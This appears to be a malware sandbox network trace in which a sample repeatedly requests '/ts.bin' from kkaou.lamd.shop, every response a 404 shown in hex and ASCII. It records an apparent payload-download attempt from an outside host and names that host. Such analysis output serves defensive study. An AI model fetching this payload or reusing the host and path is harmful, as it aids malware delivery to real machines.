                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:19.065701962 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:19.452161074 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:04 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:19.573595047 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:19.959758997 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:05 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:20.151606083 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:20.270236969 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:20.656481981 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:06 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:20.772357941 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:21.158471107 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:06 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:21.350328922 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:21.457690954 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:21.843930006 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:07 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:22.035811901 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:22.145159960 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:22.531246901 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:08 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:22.665585995 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:23.052609921 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:08 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:23.244502068 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:23.348166943 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:23.735217094 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:09 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:23.926994085 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:24.035583019 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:24.421509027 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:09 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:24.613337040 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:24.723551989 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:25.109566927 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:10 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:25.301384926 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:25.410759926 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:25.799726009 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:11 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:25.910567999 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:26.296628952 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:11 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:26.488466978 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:26.598031044 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:26.988873005 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:12 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:27.098299980 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:27.484054089 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:13 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:27.676002979 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:27.785804033 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:28.171658039 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:13 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:28.473351002 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:28.860795975 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:14 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:28.973157883 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:29.359819889 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:14 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
